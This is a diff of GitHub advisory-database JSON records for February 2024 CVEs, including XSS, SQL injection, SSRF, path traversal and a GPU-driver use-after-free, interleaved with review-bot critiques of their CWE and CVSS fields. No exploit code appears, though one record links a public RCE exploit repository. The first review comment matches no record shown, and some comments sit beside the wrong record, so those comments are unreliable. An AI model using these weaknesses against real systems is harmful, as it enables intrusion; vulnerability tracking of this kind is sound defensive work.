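Review bot: The affected statement "Inventory Agent: through 6.12.0; through 6.14.5; through 6.7.2" lists three version lines without saying which belongs to macOS, Windows or Linux, so a reader cannot match a deployed agent to the right bound; the mapping should be spelled out per platform. For a CWE-347 failure to verify signatures on update packages the vector's `AV:L` implies the attacker must already place a package locally; if the agent fetches packages over the network the exposure is broader than this score suggests, which the vendor post should be checked for. Unverified update packages consumed by a privileged agent are a supply-chain primitive, consistent with the C:H/I:H/A:H impact.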
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7w82-p9xp-fp58", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-1261" + ], + "details": "A vulnerability classified as critical was found in Juanpao JPShop up to 1.5.02. This vulnerability affects the function actionIndex of the file /api/controllers/merchant/app/ComboController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253000.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1261" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/v2JpHJngvw7E" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253000" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253000" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7x8g-jfhh-pqhm/GHSA-7x8g-jfhh-pqhm.json b/advisories/unreviewed/2024/02/GHSA-7x8g-jfhh-pqhm/GHSA-7x8g-jfhh-pqhm.json new file mode 100644 index 0000000000000..1e476c8d3b86e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7x8g-jfhh-pqhm/GHSA-7x8g-jfhh-pqhm.json 
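Review bot: No fix is referenced — the references are the NVD entry, a note-sharing link and two VulDB pages (one CTI-gated) — and "up to 1.5.02" is given without a fixed version even though `details` states an exploit is public; the record should say whether the vendor has shipped a patch. The vulnerable argument is named `pic_url`, which suggests the upload is driven by a URL the server fetches, so CWE-434 may sit alongside server-side request forgery; that is inference from the parameter name and should be confirmed against the write-up.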
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7x8g-jfhh-pqhm", + "modified": "2024-02-01T15:30:24Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-0704" + ], + "details": "Rejected reason: very low impact - impractical to correct", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0704" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-7xgh-8hg2-6j33/GHSA-7xgh-8hg2-6j33.json b/advisories/unreviewed/2024/02/GHSA-7xgh-8hg2-6j33/GHSA-7xgh-8hg2-6j33.json new file mode 100644 index 0000000000000..467839e24f4e4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7xgh-8hg2-6j33/GHSA-7xgh-8hg2-6j33.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7xgh-8hg2-6j33", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-40143" + ], + "details": "\nAn attacker with access to the Westermo Lynx web application that has the vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the \"forward.0.domain\" parameter.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40143" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:13Z" + } +} \ No newline at end of file 
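Review bot: This record's `details` is a rejection notice ("Rejected reason: very low impact - impractical to correct") but it is published as a live advisory with no `withdrawn` timestamp; OSV schema 1.4.0 provides `withdrawn` for exactly this case, and without it consumers will index a rejected CVE as an open vulnerability. Set `"withdrawn": "2024-02-01T15:30:24Z"` (or the rejection date from NVD) alongside `published`. The empty `severity`, `affected` and `cwe_ids` are then correct as-is.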
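Review bot: The CVSS vector `UI:N/S:U` is atypical for a cross-site scripting bug — XSS normally requires a victim to load the injected page (UI:R) and is scored with changed scope — and with `details` saying an attacker "with access to the … web application" injects into `forward.0.domain`, this reads as stored XSS for which the vector looks understated; the ICS-CERT reference should be checked. `details` also starts with `\n` and ends with `\n\n`, which should be trimmed. The product is named only in prose and no fixed firmware version is given.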
diff --git a/advisories/unreviewed/2024/02/GHSA-7xmr-w6vf-6jjf/GHSA-7xmr-w6vf-6jjf.json b/advisories/unreviewed/2024/02/GHSA-7xmr-w6vf-6jjf/GHSA-7xmr-w6vf-6jjf.json new file mode 100644 index 0000000000000..c35fa8ea40196 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-7xmr-w6vf-6jjf/GHSA-7xmr-w6vf-6jjf.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7xmr-w6vf-6jjf", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0678" + ], + "details": "The Order Delivery Date for WP e-Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'available-days-tf' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0678" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/order-delivery-date/trunk/order_delivery_date.php#L221" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-82fm-6qgx-7w8m/GHSA-82fm-6qgx-7w8m.json b/advisories/unreviewed/2024/02/GHSA-82fm-6qgx-7w8m/GHSA-82fm-6qgx-7w8m.json new file mode 100644 index 0000000000000..bf793223ff4d6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-82fm-6qgx-7w8m/GHSA-82fm-6qgx-7w8m.json 
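Review bot: `cwe_ids` is empty for what `details` explicitly calls stored cross-site scripting via `available-days-tf`; `"cwe_ids": ["CWE-79"]` is supportable from the text alone. The only code reference is a trac browser link into `trunk` rather than a changeset, and "all versions up to, and including, 1.2" has no fixed counterpart, which together suggest no patched release existed when this was published — that should be stated so operators know to disable the plugin rather than wait for an update. Unauthenticated stored XSS scored `S:U` with `UI:N` is also conservative relative to how such issues are usually rated.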
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82fm-6qgx-7w8m", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2023-46914" + ], + "details": "SQL Injection vulnerability in RM bookingcalendar module for PrestaShop versions 2.7.9 and before, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via ics_export.php.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46914" + }, + { + "type": "WEB", + "url": "https://security.friendsofpresta.org/modules/2024/02/06/bookingcalendar.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T09:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-82mh-pj8x-3fw7/GHSA-82mh-pj8x-3fw7.json b/advisories/unreviewed/2024/02/GHSA-82mh-pj8x-3fw7/GHSA-82mh-pj8x-3fw7.json new file mode 100644 index 0000000000000..85dd5fb9e4ee2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-82mh-pj8x-3fw7/GHSA-82mh-pj8x-3fw7.json 
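Review bot: `cwe_ids` and `severity` are both empty for a SQL injection in `ics_export.php`; `"cwe_ids": ["CWE-89"]` follows from `details`. The claim that it "allows remote attackers to execute arbitrary code, escalate privileges" is the generic NVD SQLi phrasing and is not substantiated by anything else in the record — the FriendsOfPresta reference should be checked for whether the injection is pre-authentication and what it actually reaches. "versions 2.7.9 and before" gives no fixed version.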
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82mh-pj8x-3fw7", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-0628" + ], + "details": "The WP RSS Aggregator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.23.5 via the RSS feed source in admin settings. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0628" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029525/wp-rss-aggregator" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2154383e-eabb-4964-8991-423dd68d5efb?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T07:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-82rx-j336-57m8/GHSA-82rx-j336-57m8.json b/advisories/unreviewed/2024/02/GHSA-82rx-j336-57m8/GHSA-82rx-j336-57m8.json new file mode 100644 index 0000000000000..4f6854a749844 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-82rx-j336-57m8/GHSA-82rx-j336-57m8.json 
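Review bot: `cwe_ids` is empty although `details` names the flaw as Server-Side Request Forgery; `"cwe_ids": ["CWE-918"]` is the direct mapping. The LOW rating follows from `PR:H` — an administrator on a single-site WordPress install can already run arbitrary code — so the practical concern is hosted or multisite setups where "administrator" is a constrained role with reach into internal network services, which the record could note. Changeset 3029525 is referenced but the fixed release is not stated.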
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82rx-j336-57m8", + "modified": "2024-02-02T09:30:23Z", + "published": "2024-02-02T09:30:23Z", + "aliases": [ + "CVE-2024-22851" + ], + "details": "Directory Traversal Vulnerability in LiveConfig before v.2.5.2 allows a remote attacker to obtain sensitive information via a crafted request to the /static/ endpoint.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22851" + }, + { + "type": "WEB", + "url": "https://www.drive-byte.de/en/blog/liveconfig-advisory-cve-2024-22851" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T09:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-839x-p2jc-q87x/GHSA-839x-p2jc-q87x.json b/advisories/unreviewed/2024/02/GHSA-839x-p2jc-q87x/GHSA-839x-p2jc-q87x.json new file mode 100644 index 0000000000000..b8392529f6464 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-839x-p2jc-q87x/GHSA-839x-p2jc-q87x.json 
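Review bot: `cwe_ids` and `severity` are both empty for a directory traversal on the `/static/` endpoint; `"cwe_ids": ["CWE-22"]` follows from `details`. The fixed version (2.5.2) is only in prose, and the record does not say whether the traversal is reachable before authentication, which is the single fact an operator of a hosting control panel needs first — the drive-byte write-up should be checked and the answer added to `details`.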
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-839x-p2jc-q87x", + "modified": "2024-02-05T12:30:20Z", + "published": "2024-02-05T12:30:20Z", + "aliases": [ + "CVE-2023-5249" + ], + "details": "Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver allows a local non-privileged user to make improper memory processing operations to exploit a software race condition. If the system’s memory is carefully prepared by the user, then this in turn cause a use-after-free.This issue affects Bifrost GPU Kernel Driver: from r35p0 through r40p0; Valhall GPU Kernel Driver: from r35p0 through r40p0.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5249" + }, + { + "type": "WEB", + "url": "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-83rr-gwhc-x8g8/GHSA-83rr-gwhc-x8g8.json b/advisories/unreviewed/2024/02/GHSA-83rr-gwhc-x8g8/GHSA-83rr-gwhc-x8g8.json new file mode 100644 index 0000000000000..a92bff546288d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-83rr-gwhc-x8g8/GHSA-83rr-gwhc-x8g8.json 
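Review bot: `details` describes a "software race condition" that the attacker exploits to reach the use-after-free, so `cwe_ids` should carry CWE-362 alongside CWE-416: `"cwe_ids": ["CWE-362", "CWE-416"]`. The affected range "from r35p0 through r40p0" has no stated fixed release and `severity` is empty, so a kernel-driver UAF reachable by a local non-privileged user surfaces with no score at all; the Arm security page is the only place to recover either. The text also has a typo, "then this in turn cause", and a trailing `\n\n`.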
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-83rr-gwhc-x8g8", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2023-28049" + ], + "details": "\nDell Command | Monitor, versions prior to 10.9, contain an arbitrary folder deletion vulnerability. A locally authenticated malicious user may exploit this vulnerability in order to perform a privileged arbitrary file delete.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28049" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000211748/dsa-2023-125-dell-command-monitor-dcm" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-267" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-859v-mr3m-wgxq/GHSA-859v-mr3m-wgxq.json b/advisories/unreviewed/2024/02/GHSA-859v-mr3m-wgxq/GHSA-859v-mr3m-wgxq.json new file mode 100644 index 0000000000000..9dd17b1ec8240 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-859v-mr3m-wgxq/GHSA-859v-mr3m-wgxq.json 
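Review bot: The vector `C:N/I:N/A:H` is inconsistent with `details`, which describes a locally authenticated user performing a "privileged arbitrary file delete" — deleting arbitrary files with elevated rights is an integrity impact, and on Windows such primitives are routinely chained into local privilege escalation, so availability-only scoring understates it; the Dell DSA-2023-125 reference should be checked for the intended scope. `cwe_ids` is `CWE-267`, which concerns over-broad privilege definitions; a folder-deletion bug that resolves an attacker-influenced path is closer to CWE-59 (link following) or CWE-73, to be confirmed from the vendor text. `details` carries leading and trailing `\n` that should be trimmed.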
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-859v-mr3m-wgxq", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33072" + ], + "details": "Memory corruption in Core while processing control functions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33072" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-85pp-8vhv-c78m/GHSA-85pp-8vhv-c78m.json b/advisories/unreviewed/2024/02/GHSA-85pp-8vhv-c78m/GHSA-85pp-8vhv-c78m.json new file mode 100644 index 0000000000000..4f24eda6c8de3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-85pp-8vhv-c78m/GHSA-85pp-8vhv-c78m.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-85pp-8vhv-c78m", + "modified": "2024-02-07T18:30:26Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51674" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More allows Stored XSS.This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More: from n/a through 6.9.18.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51674" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/advanced-access-manager/wordpress-advanced-access-manager-plugin-6-9-18-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-89f2-38w4-8x2m/GHSA-89f2-38w4-8x2m.json b/advisories/unreviewed/2024/02/GHSA-89f2-38w4-8x2m/GHSA-89f2-38w4-8x2m.json new file mode 100644 index 0000000000000..07801e559d19c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-89f2-38w4-8x2m/GHSA-89f2-38w4-8x2m.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89f2-38w4-8x2m", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-38579" + ], + "details": "\n\n\n\n\n\n\n\n\n\n\n\n\nThe cross-site request forgery token in the request may be predictable or easily guessable allowing attackers to craft a malicious request, which could be triggered by a victim unknowingly. In a successful CSRF attack, the attacker could lead the victim user to carry out an action unintentionally.\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38579" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-89fw-fqph-63fm/GHSA-89fw-fqph-63fm.json b/advisories/unreviewed/2024/02/GHSA-89fw-fqph-63fm/GHSA-89fw-fqph-63fm.json new file mode 100644 index 0000000000000..6ddd9b8d8536e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-89fw-fqph-63fm/GHSA-89fw-fqph-63fm.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89fw-fqph-63fm", + "modified": "2024-02-02T09:30:21Z", + "published": "2024-02-02T09:30:21Z", + "aliases": [ + "CVE-2024-0285" + ], + "details": "\nin OpenHarmony v4.0.0 and prior versions allow a local attacker cause DOS through improper input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0285" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-89x3-jgxj-39cx/GHSA-89x3-jgxj-39cx.json b/advisories/unreviewed/2024/02/GHSA-89x3-jgxj-39cx/GHSA-89x3-jgxj-39cx.json new file mode 100644 index 0000000000000..2a032f5875a08 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-89x3-jgxj-39cx/GHSA-89x3-jgxj-39cx.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89x3-jgxj-39cx", + "modified": "2024-02-06T21:30:27Z", + "published": "2024-02-06T21:30:27Z", + "aliases": [ + "CVE-2024-22514" + ], + "details": "An issue discovered in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to run arbitrary files by restoring a crafted backup file.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22514" + }, + { + "type": "WEB", + "url": "https://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-89x8-fvq4-x5w3/GHSA-89x8-fvq4-x5w3.json b/advisories/unreviewed/2024/02/GHSA-89x8-fvq4-x5w3/GHSA-89x8-fvq4-x5w3.json new file mode 100644 index 0000000000000..e0ce899d0883e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-89x8-fvq4-x5w3/GHSA-89x8-fvq4-x5w3.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89x8-fvq4-x5w3", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-08T00:32:19Z", + "aliases": [ + "CVE-2024-1066" + ], + "details": "An issue has been discovered in GitLab EE affecting all versions from 13.3.0 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2 which allows an attacker to do a resource exhaustion using GraphQL `vulnerabilitiesCountByDay`", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1066" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/420341" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T22:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8chw-9j48-7gmj/GHSA-8chw-9j48-7gmj.json b/advisories/unreviewed/2024/02/GHSA-8chw-9j48-7gmj/GHSA-8chw-9j48-7gmj.json new file mode 100644 index 0000000000000..063b1cfbc39b3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8chw-9j48-7gmj/GHSA-8chw-9j48-7gmj.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8chw-9j48-7gmj", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-50359" + ], + "details": "An unchecked return value vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow local authenticated administrators to place the system in a state that could lead to a crash or other unintended behaviors via unspecified vectors.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50359" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-07" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-252" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8frx-325f-xvxg/GHSA-8frx-325f-xvxg.json b/advisories/unreviewed/2024/02/GHSA-8frx-325f-xvxg/GHSA-8frx-325f-xvxg.json new file mode 100644 index 0000000000000..52f46dfea25bb --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8frx-325f-xvxg/GHSA-8frx-325f-xvxg.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8frx-325f-xvxg", + "modified": "2024-02-01T18:31:08Z", + "published": "2024-02-01T18:31:08Z", + "aliases": [ + "CVE-2024-1167" + ], + "details": "\nWhen SEW-EURODRIVE MOVITOOLS MotionStudio processes XML information unrestricted file access can occur.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1167" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-016-01" + }, + { + "type": "WEB", + "url": "https://www.seweurodrive.com/contact_us/contact_us.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T18:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-8gj6-33mj-vg96/GHSA-8gj6-33mj-vg96.json b/advisories/unreviewed/2024/02/GHSA-8gj6-33mj-vg96/GHSA-8gj6-33mj-vg96.json new file mode 100644 index 0000000000000..b7453ba2b038f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-8gj6-33mj-vg96/GHSA-8gj6-33mj-vg96.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gj6-33mj-vg96", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0384" + ], + "details": "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Recipe Notes in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0384" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:01Z" + } +} \ No newline at end of file diff --git 